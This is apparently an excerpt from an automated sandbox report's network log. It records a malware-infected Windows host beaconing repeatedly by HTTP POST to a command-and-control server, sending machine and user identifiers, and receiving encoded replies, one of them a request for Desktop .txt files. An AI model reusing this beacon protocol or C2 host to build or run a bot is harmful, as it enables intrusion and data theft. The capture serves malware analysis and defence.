                                                7 | 95.213.179.67 | 80 | 192.168.2.22 | 49173 | C:\Windows\SysWOW64\svchost.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:06.655970097 CEST | 296 | IN | Data Raw: 00 27 00 00 00 01 00 00 00 15 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 65 73 6b 74 6f 70 00 00 00 05 2a 2e 74 78 74 05
                                                Data Ascii: '%userprofile%\Desktop*.txt


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                70 | 192.168.2.22 | 49237 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:40.532183886 CEST | 373 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:40.698662996 CEST | 374 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKAZPARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                71 | 192.168.2.22 | 49238 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:40.971543074 CEST | 375 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:41.145374060 CEST | 375 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHNMSARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                72 | 192.168.2.22 | 49239 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:41.434386015 CEST | 376 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:41.603351116 CEST | 376 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 59 42 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYYBBARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                73 | 192.168.2.22 | 49240 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:41.904114008 CEST | 377 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:42.072706938 CEST | 377 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFFUUARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                74 | 192.168.2.22 | 49241 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:42.361474991 CEST | 378 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:42.517798901 CEST | 378 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHGTSARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                75 | 192.168.2.22 | 49242 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:42.800192118 CEST | 379 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:42.956759930 CEST | 379 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGMNTARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                76 | 192.168.2.22 | 49243 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:43.257241011 CEST | 380 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:43.413952112 CEST | 381 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVTGEARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                77 | 192.168.2.22 | 49244 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:43.688730955 CEST | 381 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:43.848915100 CEST | 382 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 56 45 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKVEPARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                78 | 192.168.2.22 | 49245 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:44.126646996 CEST | 382 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:44.293515921 CEST | 383 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:44 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 46 55 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMFUNARRABw==0


                                                Session ID: 79 | Source IP: 192.168.2.22 | Source Port: 49246 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:44.601757050 CEST | kBytes transferred: 384 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:44.768727064 CEST | kBytes transferred: 384 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:44 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFCXUARRABw==0


                                                Session ID: 8 | Source IP: 192.168.2.22 | Source Port: 49175 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:06.971990108 CEST | kBytes transferred: 298 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:07.127315044 CEST | kBytes transferred: 298 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZKPAARRABw==0


                                                Session ID: 80 | Source IP: 192.168.2.22 | Source Port: 49247 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:45.055797100 CEST | kBytes transferred: 385 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:45.212450981 CEST | kBytes transferred: 385 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJAZQARRABw==0


                                                Session ID: 81 | Source IP: 192.168.2.22 | Source Port: 49248 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:45.490674019 CEST | kBytes transferred: 386 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:45.650993109 CEST | kBytes transferred: 386 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGYBTARRABw==0


                                                Session ID: 82 | Source IP: 192.168.2.22 | Source Port: 49249 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:45.925512075 CEST | kBytes transferred: 387 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:46.091377020 CEST | kBytes transferred: 387 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYJQBARRABw==0


                                                Session ID: 83 | Source IP: 192.168.2.22 | Source Port: 49250 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:46.375261068 CEST | kBytes transferred: 388 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:46.543394089 CEST | kBytes transferred: 388 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVKPEARRABw==0


                                                Session ID: 84 | Source IP: 192.168.2.22 | Source Port: 49251 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:46.829147100 CEST | kBytes transferred: 389 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:46.996254921 CEST | kBytes transferred: 389 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFGTUARRABw==0


                                                Session ID: 85 | Source IP: 192.168.2.22 | Source Port: 49252 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:47.276248932 CEST | kBytes transferred: 390 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
